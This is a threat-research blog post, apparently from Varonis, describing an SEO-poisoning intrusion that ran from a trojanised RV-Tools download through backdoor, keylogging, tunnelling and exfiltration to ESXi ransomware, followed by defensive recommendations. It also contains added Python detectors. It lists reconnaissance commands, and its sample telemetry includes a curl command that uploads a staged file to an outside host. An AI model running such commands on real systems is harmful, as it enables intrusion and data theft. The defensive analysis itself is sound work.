One Small Click for an Admin, One Giant Breach for the Organization 

Cyber attackers are targeting IT admins, using clever SEO tricks to push malicious payloads disguised as legitimate tools to the top of search results.
Varonis Threat Labs
Last updated April 24, 2025

Attackers are increasingly directing malicious payloads toward IT admins, posing as legitimate tools using Search Engine Optimization (SEO) techniques to move their payloads toward the top of search results.  

The compromise of an administrative account can lead to rapid data exfiltration and encryption (ransomware), usually in a double-pronged attack with the threat actor demanding a ransom not only to decrypt the existing data but also a separate payment to not leak stolen data. 

As organizations become more adept at protecting their networks from common initial access techniques such as phishing, we’re observing a higher prevalence of SEO poisoning, a watering-hole-style attack. 

Tom Barnea and Simon Biggs from our Varonis MDDR Forensics team have recently worked on multiple cases where SEO poisoning played a role in the threat actor's Initial Access. We hope the guidance they provide here helps other organizations learn about the threat and improve their overall defensive posture. 

What is SEO Poisoning? 

SEO poisoning refers to the use of common online marketing techniques alongside malicious actions to boost the ranking of threat actor-controlled websites across major search engines such as Google. This leads unsuspecting users to think the content is trustworthy.  

Attackers disguise malicious payloads as well-known tools hosted on these sites, utilising the reputation of the tool name along with their top result status in search engines to fool admins into believing they are downloading non-malicious software. 

In fact, the malicious payload often bundles the legitimate software it masquerades as, while in the background it may be establishing a command-and-control backdoor. 


Initial Access and Persistence 

Our MDDR team observed the Initial Access of a cyber threat into a customer’s network after a Domain Admin searched for and downloaded a weaponized version of RV-Tools, a VMware monitoring and management utility. In this instance, the malicious code ran alongside the legitimate version of the software with no immediate indication of compromise. 

Once executed, the malicious payload led to the deployment of a PowerShell-based .NET backdoor commonly referred to as SMOKEDHAM. This backdoor provided the threat actor with persistent access to the device in question and opened the door for additional in-network malicious activity. 

A diagram of the infection chain is shown below: 


Attack flow summary diagram 

Discovery 

Following the initial execution of the SMOKEDHAM backdoor, the adversary was observed running several reconnaissance-focused commands, including but not limited to the following: 

  • whoami – Used to obtain user information 
  • systeminfo – Used to obtain system information 
  • nslookup REDACTED.local – Used to obtain DNS/Domain information 
  • gpresult /r – Used to obtain Group Policy settings 

The results of these commands were saved to a file located in C:\ProgramData and subsequently uploaded to an attacker-controlled AWS EC2 instance via curl. Shortly thereafter, the threat actor deployed an employee-monitoring software known as Kickidler, renamed to 'grabber.exe'. 

This software enabled the threat actor to surreptitiously monitor machines with capabilities such as screenshotting the desktop and logging keystrokes on victim machines, enabling further compromise. 
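The command sequence above is a usable detection pattern. The Python below is an added example, not code from Varonis or the original post: it runs over constructed process-creation telemetry (the field layout, the powershell.exe parent, the host 203.0.113.10 and the file names are assumptions) and flags a parent process that launches several discovery binaries in quick succession, plus a curl run that uploads from ProgramData.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery binaries seen in the case above, matched on image name only.
RECON_BINARIES = {"whoami.exe", "systeminfo.exe", "nslookup.exe", "gpresult.exe"}
WINDOW = timedelta(minutes=10)   # all recon commands must fall within this span
MIN_DISTINCT = 3                 # distinct recon tools from one parent before alerting

# Constructed process-creation telemetry (not data from the incident).
# Field layout: timestamp|user|parent_image|image|command_line
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    rf"2025-04-01T10:00:01|CORP\dadmin|{PS}|C:\Windows\System32\whoami.exe|whoami",
    rf"2025-04-01T10:00:04|CORP\dadmin|{PS}|C:\Windows\System32\systeminfo.exe|systeminfo",
    rf"2025-04-01T10:00:09|CORP\dadmin|{PS}|C:\Windows\System32\nslookup.exe|nslookup REDACTED.local",
    rf"2025-04-01T10:00:15|CORP\dadmin|{PS}|C:\Windows\System32\gpresult.exe|gpresult /r",
    rf"2025-04-01T10:02:30|CORP\dadmin|{PS}|C:\Windows\System32\curl.exe|curl -T C:\ProgramData\r.txt http://203.0.113.10/up",
    r"2025-04-01T11:30:00|CORP\helpdesk|C:\Windows\System32\cmd.exe|C:\Windows\System32\whoami.exe|whoami",
]

def parse(line):
    """Split one telemetry line into a dict; image is reduced to its lowercase file name."""
    ts, user, parent, image, cmd = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "user": user, "parent": parent,
            "image": image.rsplit("\\", 1)[-1].lower(), "cmd": cmd}

def detect_recon_bursts(lines):
    """Return alerts for (user, parent) pairs that run MIN_DISTINCT or more distinct
    recon binaries within WINDOW, and for any curl run that references ProgramData
    (the staging location used for the collected output in the case above)."""
    by_parent = defaultdict(list)
    for e in sorted((parse(l) for l in lines), key=lambda ev: ev["ts"]):
        by_parent[(e["user"], e["parent"])].append(e)
    alerts = []
    for (user, parent), evs in by_parent.items():
        recon = [e for e in evs if e["image"] in RECON_BINARIES]
        for i, first in enumerate(recon):
            seen = {e["image"] for e in recon[i:] if e["ts"] - first["ts"] <= WINDOW}
            if len(seen) >= MIN_DISTINCT:
                alerts.append(("recon_burst", user, parent, sorted(seen)))
                break
        for e in evs:
            if e["image"] == "curl.exe" and "programdata" in e["cmd"].lower():
                alerts.append(("staged_upload", user, parent, e["cmd"]))
    return alerts

if __name__ == "__main__":
    for alert in detect_recon_bursts(SAMPLE_LOG):
        print(alert)
```

A single whoami from the helpdesk account is below the threshold, so only the powershell.exe parent produces alerts.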

Lateral Movement  

There was a significant pause in observed threat actor activity that lasted for several days after Kickidler's deployment. The reasoning for this is not 100% known, but our main theory is that the delay provided time for additional credentials to be captured. It is also possible that the initial attack was part of an automated process, and hands-on keyboard activity had not yet occurred. 

Activity resumed with lateral movement to multiple servers via Remote Desktop Protocol (RDP) and PsExec — two very common techniques we observe when carrying out breach response.  

The threat actor carried out additional network discovery actions, such as network and share scanning, during this period as they attempted to learn more about the customer’s network. 


UBA Alerts highlighting early anomalous behavior by the compromised accounts 

Additional Command and Control 

Our team also observed the threat actor deploy a further persistence mechanism in the form of KiTTY, a tool that facilitates SSH communications, renamed to fork.exe to disguise it.  

This was used to create a reverse tunnel for RDP traffic over SSH to the previously mentioned EC2 instance over port 443. Masquerading traffic on the HTTPS port (443) is a common tactic for threat actors since blocking this requires a next-gen firewall capable of inspecting all application-layer traffic.  

Port 443 is often open to allow web browser traffic and less-mature organizations typically do not have tools that will inspect application-layer protocols to block non-HTTPS traffic traversing 443 — something threat actors are aware of and abuse on a regular basis. 
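An application-aware control can tell SSH on port 443 from real HTTPS by looking at the first bytes the client sends: TLS begins with a handshake record header, SSH with an identification string. The Python below is an added example and not part of the original post; the flow records and addresses are constructed, and the port-to-protocol expectation table is an assumption.

```python
# Constructed flow records: (src, dst, dst_port, first bytes of client payload).
# None of these are from the incident; addresses are from documentation ranges.
SAMPLE_FLOWS = [
    ("10.0.0.5", "198.51.100.20", 443, b"\x16\x03\x01\x00\xf4\x01\x00\x00\xf0\x03\x03"),  # TLS ClientHello
    ("10.0.0.7", "203.0.113.10", 443, b"SSH-2.0-ConstructedClient_1.0\r\n"),             # SSH banner on 443
    ("10.0.0.9", "203.0.113.10", 443, b"GET / HTTP/1.1\r\nHost: example.test\r\n"),       # plaintext HTTP on 443
    ("10.0.0.9", "10.0.0.3", 22, b"SSH-2.0-ConstructedClient_1.0\r\n"),                   # SSH where expected
]

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")

def classify_payload(data: bytes) -> str:
    """Identify the application protocol from the first bytes the client sends."""
    # TLS record header: content type 0x16 (handshake), version 0x03 0x00..0x04.
    if len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04:
        return "tls"
    # The SSH identification string (RFC 4253) always starts with "SSH-".
    if data.startswith(b"SSH-"):
        return "ssh"
    if data.startswith(HTTP_METHODS):
        return "http"
    return "unknown"

# Protocols an allow-rule on each port is meant to carry (assumed policy).
EXPECTED_ON_PORT = {443: {"tls"}, 22: {"ssh"}, 80: {"http"}}

def find_port_protocol_mismatches(flows):
    """Return flows whose observed protocol is not the one the port is allowed for."""
    alerts = []
    for src, dst, port, payload in flows:
        observed = classify_payload(payload)
        expected = EXPECTED_ON_PORT.get(port)
        if expected is not None and observed not in expected:
            alerts.append({"src": src, "dst": dst, "port": port, "observed": observed})
    return alerts

if __name__ == "__main__":
    for alert in find_port_protocol_mismatches(SAMPLE_FLOWS):
        print(alert)
```

A port-only firewall rule passes all four flows; the byte-level check isolates the two non-TLS sessions on 443.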

In addition, the threat actor was also observed deploying Remote Monitoring and Management (RMM) utility AnyDesk as an additional C2 and persistence mechanism on several devices. 


One source of AnyDesk execution via Prefetch Analysis. Multiple other evidence sources such as AnyDesk log files informed additional AnyDesk activities in the environment. 

Exfiltration  

The threat actor then began targeting file servers by installing the well-known file transfer application WinSCP and subsequently using this to mass-exfiltrate data into their EC2 instance.  

In this case, we observed the attacker successfully transfer nearly a terabyte of data out of the network — a huge breach with severe consequences. 


A review of file activity for the compromised users demonstrated a clear access spike related to data exfiltration 
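The access spike in the caption above is the kind of signal a per-user hourly baseline catches, and it is the core of the behavior-based detection discussed later in this post. The Python below is an added example and not Varonis' UEBA logic; the audit events, share names and thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

def make_sample_events():
    """Constructed file-access audit events: (timestamp, user, path). Not incident data."""
    events = []
    # Baseline: five working days, the admin opens about 20 files in each active hour.
    for day in range(1, 6):
        for hour in (9, 10, 11, 14):
            for i in range(20):
                events.append((f"2025-04-0{day}T{hour:02d}:{i:02d}:00", r"CORP\dadmin",
                               rf"\\fs01\share\doc{i}.docx"))
    # Spike: overnight the same account touches 3,000 files on a finance share.
    for i in range(3000):
        events.append((f"2025-04-06T02:{i % 60:02d}:00", r"CORP\dadmin",
                       rf"\\fs01\finance\f{i}.xlsx"))
    return events

def hourly_counts(events):
    """Count accesses per (user, YYYY-MM-DDTHH) bucket."""
    counts = Counter()
    for ts, user, _path in events:
        counts[(user, datetime.fromisoformat(ts).strftime("%Y-%m-%dT%H"))] += 1
    return counts

def find_access_spikes(events, factor=10, min_events=200, min_history=5):
    """Flag hours where a user's access count exceeds factor x the median of their
    earlier hourly counts; min_events suppresses low-volume noise and min_history
    skips accounts with too little history to baseline."""
    per_user = defaultdict(list)
    for (user, bucket), n in sorted(hourly_counts(events).items()):
        per_user[user].append((bucket, n))
    alerts = []
    for user, series in per_user.items():
        for i, (bucket, n) in enumerate(series):
            history = [c for _, c in series[:i]]
            if len(history) < min_history:
                continue
            baseline = median(history)
            if n >= min_events and n > factor * baseline:
                alerts.append({"user": user, "hour": bucket, "count": n, "baseline": baseline})
    return alerts

if __name__ == "__main__":
    for alert in find_access_spikes(make_sample_events()):
        print(alert)
```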

Data encryption 

At this point in the engagement, the actor had completed most of their objectives minus the final one — encryption of data for ransom.  

The primary encryption target was the customer's ESXi devices. With Domain Admin access, the attacker accessed the relevant ESXi servers and encrypted the underlying VMDK files, which resulted in significant disruption to the customer's business. 


Ransomware note example 

Good intentions can often lead to unintended consequences  

A seemingly harmless action, such as downloading what appeared to be a well-known IT utility, set off a domino effect that culminated in severe consequences: sensitive data exfiltration, large-scale encryption, and a massive compromise of critical users and assets. 

It is crucial to plan your security posture using the principle of “Defense in Depth.” As cybersecurity defenders, it is critical to ensure comprehensive security across all seven layers of cybersecurity — from the human layer to data and mission-critical assets. 


Defensive recommendations 

There were multiple areas along the cyber kill chain where additional monitoring, defensive measures, or automation could have helped this victim rapidly catch, contain, and evict the threat actor.  

Some of the key defensive recommendations our team suggests others incorporate include: 

  • Mission-critical assets 
    • Audit and harden access to business crown jewels such as Domain Controllers, databases, etc. 
    • Restricting this access to specific subnets or forcing an MFA challenge can help to reduce this attack vector further 
  • Data security layer 
    • Auditing access to data and associated privileges is key to understanding and detecting attacks 
    • Being able to accurately classify impacted data is crucial for understanding the scope of an incident, as well as assessing potential damage from both the legal and business perspectives 
  • Endpoint security layer 
  • Application security layer 
    • Implement policies for application allow-listing to prevent unknown threats 
    • Prioritize blocking system administration tools that could be exploited by threat actors, such as RMM or file transfer utilities  
  • Network layer 
    • To thwart lateral movement by threat actors, implement network segmentation using VLANs or micro-segmentation to isolate critical assets 
    • Restrict remote access protocols and enforce stringent security group policies for users and devices, ensuring access is granted based on the least privilege principle  
  • Perimeter security layer 
    • Use URL filtering to block access to potentially harmful websites, including newly registered domains, file-sharing domains, etc.  
    • Restrict network traffic to prevent connections to Cloud Service Providers or File Sharing sites as much as possible, as threat actors often abuse these for C2 and Exfiltration 
  • Human layer 
    • Employee training is key to providing strong cyber knowledge and helping employees recognize potentially suspicious links, emails, or files 
    • Educate users to verify URLs before entering credentials or downloading files, and use bookmarks for frequently visited sites to avoid typosquatting traps 

Don’t wait for a breach to occur. 

Even with the best training, policies, and infrastructure, breaches will happen.

Implementing strong defensive policies helps to ensure that when a breach occurs, the damage is minimized, and the threat is caught and stopped as soon as possible. 

Varonis can help detect compromised users and devices before major damage occurs using User and Entity Behavior Analysis (UEBA). Identifying compromised assets before they can cause a major business impact is a key step in improving any organization’s overall security posture.  

Detecting this type of activity as early in the cyber kill chain as possible is critical to reducing the blast radius of any potential breach and minimizing damage to the enterprise.  
